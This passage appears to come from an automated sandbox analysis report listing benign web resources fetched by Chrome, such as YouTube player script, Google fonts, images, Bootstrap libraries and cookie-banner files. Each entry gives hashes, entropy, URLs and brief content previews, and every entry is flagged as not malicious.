                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3391)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):27929
                                                                                                                                                                                                                                                            Entropy (8bit):5.539953283552168
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:QoYRgyq+e8+9/fgTy5xFNzfXFdY6nJXWiA/eKkGtUFdMUe2:p+1k/oWnzfXQwJGxcP
                                                                                                                                                                                                                                                            MD5:488DE423B851CEC098A22CCB24090368
                                                                                                                                                                                                                                                            SHA1:62D0A17A9F088B6F933C1A3AD0DC04E477C90AE9
                                                                                                                                                                                                                                                            SHA-256:4954F112E167FF8C7163399CA65087D636A313F00D5BB393D2A5006EDE8AF6F6
                                                                                                                                                                                                                                                            SHA-512:81853408642F7E0B526AF92E44CC4450F401BF63F7EFA661ED04675D9F25111F778229760A31E37FD1221C2C4A5D54113719E779DBACB72183E2E98E0660691C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/s/player/59acb1f3/player_ias.vflset/en_US/embed.js
                                                                                                                                                                                                                                                            Preview:(function(g){var window=this;'use strict';var Ueb=function(a){a.mutedAutoplay=!1;a.endSeconds=NaN;a.limitedPlaybackDurationInSeconds=NaN;g.ZJ(a)},Veb=function(){return{G:"svg",.X:{height:"100%",version:"1.1",viewBox:"0 0 110 26",width:"100%"},W:[{G:"path",Xb:!0,N:"ytp-svg-fill",X:{d:"M 16.68,.99 C 13.55,1.03 7.02,1.16 4.99,1.68 c -1.49,.4 -2.59,1.6 -2.99,3 -0.69,2.7 -0.68,8.31 -0.68,8.31 0,0 -0.01,5.61 .68,8.31 .39,1.5 1.59,2.6 2.99,3 2.69,.7 13.40,.68 13.40,.68 0,0 10.70,.01 13.40,-0.68 1.5,-0.4 2.59,-1.6 2.99,-3 .69,-2.7 .68,-8.31 .68,-8.31 0,0 .11,-5.61 -0.68,-8.31 -0.4,-1.5 -1.59,-2.6 -2.99,-3 C 29.11,.98 18.40,.99 18.40,.99 c 0,0 -0.67,-0.01 -1.71,0 z m 72.21,.90 0,21.28 2.78,0 .31,-1.37 .09,0 c .3,.5 .71,.88 1.21,1.18 .5,.3 1.08,.40 1.68,.40 1.1,0 1.99,-0.49 2.49,-1.59 .5,-1.1 .81,-2.70 .81,-4.90 l 0,-2.40 c 0,-1.6 -0.11,-2.90 -0.31,-3.90 -0.2,-0.89 -0.5,-1.59 -1,-2.09 -0.5,-0.4 -1.10,-0.59 -1.90,-0.59 -0.59,0 -1.18,.19 -1.68,.49 -0.49,.3 -1.01,.80 -1.21,1.40 l 0,-7.90 -3.28,0 z
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 14008, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14008
                                                                                                                                                                                                                                                            Entropy (8bit):7.984868647707068
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:9uijJ0ZY8nwCjNZskjzvzJH+byUaMSTkPunxOl:99J0Z5v333vzJzUNA2
                                                                                                                                                                                                                                                            MD5:1BABA341F2494CA77C3B2BB813FAB234
                                                                                                                                                                                                                                                            SHA1:4C5C4570E1EA5A520D460C71360671401DE8CFB1
                                                                                                                                                                                                                                                            SHA-256:1CB72F0F54EC9688A1A1713983EE9B26C9FCAC44FC0DD09A3451FEA0D46BE8B3
                                                                                                                                                                                                                                                            SHA-512:652F91BA2205F3877428AAC080AA30C7ECE66C074527600BA43CD72F99FBF76119A97BE9CCB16DBB75CD1CF06D100C7219BA74B21293EEC982D707A77D56465C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjsUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......6.......|...6J.............................&..Z?HVAR...`?STAT..'...p/<....X.u..^.0.t.6.$..N. ..>. ....o.P.v>..Y.=...<FQ2X.G"...\....Q.c.m.....Xv.p.*.B......xM..Ika.M_..;.YI..<bn..=[Oy6..&C....E...lz.uz......oM..7..1v-dK..1.I'...1......>8....{..]5QQCo.....Jd.Y.^5.ox.H.l.(......6..-.....H...$2.W.%..%X.....`V&2,.*....:d..y'$...........,./...........K./..B..&!....!..1..H0.j..... ..`Cd...6,.:.e.?.e\. .Y.L.............s.......E..hI.B..@e....X..z.i...>....A...{....&.B.<.c.....P."S....a..;.:2.d[..nr..vJL..5.wsb..=..!i.%xJ......{..FV..7M0l...)..s...@......8h.b2....<....qq..!......$%.....n..O..8.(.QK&.* 9".(+..b.^u...".u...4...Iv...../.9.E..}...x.y..j.".`...&...i.ES.yj....X.C....g.<..a.-X.....D.i'[v..MK.g...v.......sE..t.+.G..T....V;.E-..\....b...CR..NI..W..*.....OW.F.V..~..p.1.s............].1.t.....X..Y.Y.W>p.V..p\........#.a..g...xv..:.T._@..@..:...`B...)vi@p<S]C.......bPk.;.6.u.....p2.x...(.*-`W.F-.a...1..,l..8(!...L..6.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):200150
                                                                                                                                                                                                                                                            Entropy (8bit):7.975131381508971
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:DrH3o30tLGG7iE+bpi4i2rKLwkt6/24+b63cn2/0TO3j5mZbcLlr9S4+VcE7Ohwd:n3okp4+2rJkt+sbEx/cq7Rr9S4qF7OE
                                                                                                                                                                                                                                                            MD5:C81322618F62B84B4CC43959A5C2EF43
                                                                                                                                                                                                                                                            SHA1:37CEDD7D719DE7E4C7EAB0C4256716D370FBFF67
                                                                                                                                                                                                                                                            SHA-256:CD6DD66B3A52DCAB309971A77BE1F18CFACA575E48EDD455DE3FED5DA166E750
                                                                                                                                                                                                                                                            SHA-512:551F2B97BD21A0849104F1B6ED04CAC712D0B7A883A001D8EB949F0ABC3E28D5534D53235C4FE30EF83F985C0D5E8E56ACFEA5B553308556A05A39055539D2CA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CDE6081C81D1E411A980E40920955374" xmpMM:DocumentID="xmp.did:7CFC847D62EF11EA8C6B923AE6C8D50E" xmpMM:InstanceID="xmp.iid:7CFC847C62EF11EA8C6B923AE6C8D50E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81378fcc-e360-4f5a-b73c-73862c40622c" stRef:documentID="adobe:docid:photoshop:d542e5bf-ab7d-117d-97cb-de041ad347d3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (948)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6037
                                                                                                                                                                                                                                                            Entropy (8bit):5.477440827983896
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:8574flnsqW96y2RstaKhee+onyKm3hx/Sxc514KOH6vdMDWHTvCzfNS2Sz8gvaiz:S7855qXnyGxDKOavZzFSG
                                                                                                                                                                                                                                                            MD5:64A245B9F8706DF249D55B2427AAD411
                                                                                                                                                                                                                                                            SHA1:0B63BC9CEE8A05A64B853E3C8D645D8D6F1E3A8D
                                                                                                                                                                                                                                                            SHA-256:FB23B36C1135A82794877E74CF8F5FA795428F98860C93B53AECC5AC83FC088C
                                                                                                                                                                                                                                                            SHA-512:FD86113ABE9FE887AAFB666511482DBBAAE2428CA50D9E902C097A110A4B2808E570AC883FBB0557899163945B940AF837C51660D4AA2892AA21A95640751AD9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.DLVh3rihYK8.es5.O/ck=boq-one-google.OneGoogleWidgetUi.xIgYPDjrJ0Y.L.B1.O/am=gNcGAAAE/d=1/exm=A7fCU,BVgquf,COQbmf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KG2eXe,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,U0aPgd,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,VwDzFe,XVMNvd,Z5uLle,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,bm51tf,byfTOb,e5qFLc,fKUV3e,gychg,hKSk3e,hc6Ubd,hnN99e,kWgXee,kjKdXe,lazG7b,lsPsHb,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_r,_tp,calloutview/ed=1/wt=2/rs=AM-SdHvKPgeuANF_DFsbYkEVpPrE38ImwA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;xqZiqf:wmnU7d;zxnPse:GkRiKb;EVNhjf:pw70Gc;NSEoX:lazG7b;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.p("Wt6vjf");.var zz=function(a){_.A.call(this,a)};_.E(zz,_.A);zz.prototype.Xa=function(){return _.bl(this,1)};zz.prototype.uc=function(a){_.y(this,1,a)};zz.Vb="f.bo";var Az=function(){_.Jn.call(this)};_.E(Az,_.Jn);Az.prototype.ab=function(){this.Kr=!1;Bz(this);_.Jn.prototype.ab.call(this)};Az.prototype.i=function(){Cz(this);if(this.Ok)return Dz(this),!1;if(!this.Ms)return Ez(this),!0;this.dispatchEvent("p");if(!this.Zp)return Ez(this),!0;this.Mo?(this.dispatchEvent("r"),Ez(this)):Dz(this);return!1};.var Fz=function(a){var b=new _.nu(a.Dy);null!=a.Oq&&b.i.set("authuser",a.Oq);return b},Dz=function(a){a.Ok=!0;var b=Fz(a),c="rt=r&f_uid="+_.Qi(a.Zp);_.Lp(b,(0,_.F)(a.j,a),"POST",c)};.Az.prototype.j=function(a){a=a.target;Cz(this);if(_.Sp(a)){this.Pn=0;if(this.Mo)this.Ok=!1,this.dispatchEvent("r");else if(this.Ms)this.dispatchEvent("s");else{try{var b=_.Tp(a),c=JSON.parse(b.sub
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 660 x 313, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):128292
                                                                                                                                                                                                                                                            Entropy (8bit):7.995460303593401
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:Qo3RMy7/ouXGXOHgEk9rBrJ25nEGFiKaMHs+Il+bBfqUMBb:Q4MyUkO9PBrJ2xEGHaMM+Q+I9
                                                                                                                                                                                                                                                            MD5:9D6EED1786306EEA7670561A1FB64B34
                                                                                                                                                                                                                                                            SHA1:1A3E2D0EEC65A1F5202BF3694F6F33114FB31622
                                                                                                                                                                                                                                                            SHA-256:4223F78E126426DF74C9CD9725F4DB4B8B71616C3BD6F0A838F379BFF400A506
                                                                                                                                                                                                                                                            SHA-512:2B2D496F137FB1CB36A7A4703228BBCBF7B9076063A164A67755FB6923D1B8242ABDF2E9B66E8521E2E37AE4082DFEDE7AC35564935A2CF5BC2149EF665B1A14
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/hXMSnnnK17inbOjeyLqFBx3HrKFKdAJlO0cuhNdwe3Yz0O4axkn9ULNFcaEi_zbL_oKUs3VvZM6sAVUB_-gwzDrLwN-ahxnefG0IYhA=s660
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.......'.....sBIT.....O... .IDATx..y.dYU&..s".9U.7.B..(@.AA.@...v@.l.OQ...<@#..L.>...'....i..k..FPD...*.Q.nV.P..y.........Z...EIi....s.^{.k...".9.a.s....p...9.a.s....?.'.9.a.s....`0O.s....0.9..`...0.9.a.s...<y.a.s....p..y....0.9......=.9.a.s......{.s....0.;.....0.9.a.w0.'.9.a.s....`0O.s....0.9..`...0.9.a.s...<y.a.s....p..y....0.9......=.9.a.s.........a.s...../...-2..7...../.. ...}.;8t .0..y....0.9.a?0...lm.x[..r.)...Kr..\.(.[.....y.........@...c ..P....yk5....\...a.)|...0.9.a.s.!.ln....y..b.xk...r....r.|z]>t-.|....(...U`..K@...b3"...B.D..y.>...Y^=0X\\.....%yo..].o..,...w.D....{.W...t...a...pv.s....0.9...F.......zIN...o.s....?..s.../o~s..k..........UHw.J........l..@F......|.#.9..T....7.Z<y|_..Y.w<}z../.e.>.q.!..._..y..NW.;.U..U..{5...0Z...X]....jGPs....0.9$.`.H....h&2...d2...x.'.[..y9}..o.O..o.....(N...G.......]..D @....t...a.%...60.L".P."......*TA.f......s<K..;...3....~.........;......W_.*TG.....X=..........c..t"....... R.9.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48664)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):48944
                                                                                                                                                                                                                                                            Entropy (8bit):5.272507874206726
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                                                                                                                            MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                                                                                                                            SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                                                                                                                            SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                                                                                                                            SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                                                                                                                                                            Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 2096 x 1182, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1397912
                                                                                                                                                                                                                                                            Entropy (8bit):7.999502782649447
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:24576:klmmw+GdWIw6bsSpYx6/7IP44xYalp2jl6SPZBUdQIY+JYrQ+4v7n+xy++lkvFDR:klmmw1nvt2xl7xYy2jlbBSQIYjQ+4vDS
                                                                                                                                                                                                                                                            MD5:24937F8EC9D3CDA2FE594281D24032A8
                                                                                                                                                                                                                                                            SHA1:EE261D7971C8BE75A25886830597D53441E28328
                                                                                                                                                                                                                                                            SHA-256:D045CDD72AB608D8FD1502364774695AEF75DE9857BF9B329E81CEA487005449
                                                                                                                                                                                                                                                            SHA-512:3FF049F3EF1FB619CD16E902AD5A3E57B67C3764FEE3DC8BDF20DDD311C47D6B45D29B5DDB4A6D946F41416CE0F7AF1B3AF83B5C01DFDAC6748261E125EFC40A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/Gfg_2023_Developer_Summit_U7Mcdkc.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...0.................tEXtSoftware.Adobe ImageReadyq.e<...xiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:057644e4-7c43-4d7f-9ac1-34b9316abd3e" xmpMM:DocumentID="xmp.did:63646504B21311ED8819D3BA196521D9" xmpMM:InstanceID="xmp.iid:63646503B21311ED8819D3BA196521D9" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0cd20916-8c3c-4aab-a64a-d9ae52654838" stRef:documentID="xmp.did:057644e4-7c43-4d7f-9ac1-34b9316abd3e"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Ez...P.IDATx....$..$.O...B2.I:..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (50758)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):51039
                                                                                                                                                                                                                                                            Entropy (8bit):5.247253437401007
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                                                                                                                                            MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                                                                                                                                            SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                                                                                                                                            SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                                                                                                                                            SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                                                                                                                                                            Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):69280
                                                                                                                                                                                                                                                            Entropy (8bit):7.994691466011386
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:1536:HDcltEmzRKaJVE4LJ2sTpGVLSAPqO1oDeGDDM2JGf26:jc8mFKaz/JJAS+1fGsa4v
                                                                                                                                                                                                                                                            MD5:4CB8D6C2A61CA423A1B4FA77CB4AA232
                                                                                                                                                                                                                                                            SHA1:29B0EFEBC3D9E876F0F730DDDA10BF174DB60899
                                                                                                                                                                                                                                                            SHA-256:018CBFC6933AC37BF57342296AA9A3AA304785BA54D301BE9CEA46CCB127B572
                                                                                                                                                                                                                                                            SHA-512:80DCE20CEE1967B7B7BD56A3D9A045EBD90483640D6176BF80163A0A42B5D4AEE3CFB7F2A017E89B97C524A318F9612A2B4B17ED0EA471169474D3BC75275A20
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:RIFF....WEBPVP8X...........j..ALPH.[.....m.H+..{......n.)...C.G.oEo_.Y...D.....".....25n......d.....9....K`w.^ .....!X6H....w.d!,...`.%.dk....^.4.yf..q.[]b:......m....BP...p..p........Hvcg...:.+o9..v..v.Wv;.G..S;....... .(J:M-w.H.4.XMRb.b..r)Q.x.\.P.b..<3..P(........ .Zi.....$>.......q...<]D........n..)n..&.||...o.J.......'q&.!"E.........T&.......o.e.$.+!..e....1....1..u ..+..F....j.vM.bx...$W.<o.N..@MJ..U.B.Y.........\.Xz..F....|.y.BL........@.W..++ .+..;..U.m.B.+..Hk._.X.j.*....U.Xl".U.X.6E2TVA\i.m..W..W...e....L...r......u.\Ixu.e..+.!.$.U?...j..r&..b"KN&Co......d....".U.....`8..F....B.X.L.d<._.......{.[.p.@..i{{.......kC........oK.H.*..3.....h..]\$....V....].?.>a..d|..V:J.x.y.....X'.....m...78..q]......m.......X..2..8...L.wm.........3l..1.....y[..3i.!..LF.m.EL.fv.:...nT.:{..#fE....1}.`E.{mT{..jv.C......3..x...c@7...7.x..-........7......e2.......G.(...C........F.L..6c....b..?fT.x.mW...0.?>b....Z...7..c.r..v.P...i..Q)......R...!<..G.T
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):254
                                                                                                                                                                                                                                                            Entropy (8bit):4.562407526298979
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:q1T3KHKgYBFpKnKyjqLBaEwVNvwCTXHSOK:qd3KqgYBTGyLp0LHtK
                                                                                                                                                                                                                                                            MD5:1A4BCE8258288DE0C72FAE22657C4551
                                                                                                                                                                                                                                                            SHA1:3729DF04CC25427F2E47F530FEBEB5BEE6EE9E75
                                                                                                                                                                                                                                                            SHA-256:7AB6D9009AB1E9694A90C6A6604B6D244457347C354C10156E41CC8133E9C8A8
                                                                                                                                                                                                                                                            SHA-512:27A17B0629E306C6E9CB2B1D1F3F1025A99EEFAB3B0B4949AED1AD48A1C5F0DD84D9F773F75B6C31D1A04F077E7E7D75C6DD0280250CCA2ADCAA349159684E0A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/intl/en/brandstudio/kato/cookie_choice_component/config.json
                                                                                                                                                                                                                                                            Preview:{. "mainText": "This site uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic.",. "moreText": "Learn more",. "moreUrl": "https://policies.google.com/technologies/cookies",. "consentText": "Ok, Got it".}.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6519), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6519
                                                                                                                                                                                                                                                            Entropy (8bit):4.992553514100523
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:WofVBnjr7DRZyjQBDNvBlR2TQjqXR2T8DOf7owxUKIG50i0BmUmnG5PUKIvrlLUk:W0VB/BDNvB1b6++WRn5uu
                                                                                                                                                                                                                                                            MD5:E489E2B7E2AE92A1417E1251EBB251C2
                                                                                                                                                                                                                                                            SHA1:999E54D8993673E3E358DBD25D2528DEC4A8D067
                                                                                                                                                                                                                                                            SHA-256:7B187235E7020402392BAA7E9DECDA9488537B5A99395B0EB806A38DE6F13115
                                                                                                                                                                                                                                                            SHA-512:171ABB6995E3A360D869D38289880E636EC5F5D908898E2250BC384114B0C8DAFEF1720F5F8970A89C55C0BC47D25C5B7273AD9A11ABD90DC367A08FBBAD8926
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/glue/v26_0/ccb.min.css
                                                                                                                                                                                                                                                            Preview:body #cookieBar{background-color:#fff;box-shadow:0 1px 6px 0 rgba(54,64,67,.8);height:auto;min-height:64px}body #cookieBar .cookieBarInner{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;padding:0;width:100%}body #cookieBar .cookieBarText{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;color:#5f6368;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;font-family:Google Sans Text,Arial,Helvetica,sans-serif;font-size:1rem;font-weight:400;letter-spacing:.1px;line-height:1.75;margin:0;padding:12px 20px;text-rendering:optimizeLegibility}body #cookieBar .cookieBarButtons{-webkit-align-self:flex-end;-ms-flex-item-align:end;align-self:flex-end;d
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40269
                                                                                                                                                                                                                                                            Entropy (8bit):7.965856048079124
                                                                                                                                                                                                                                                            Encrypted:false
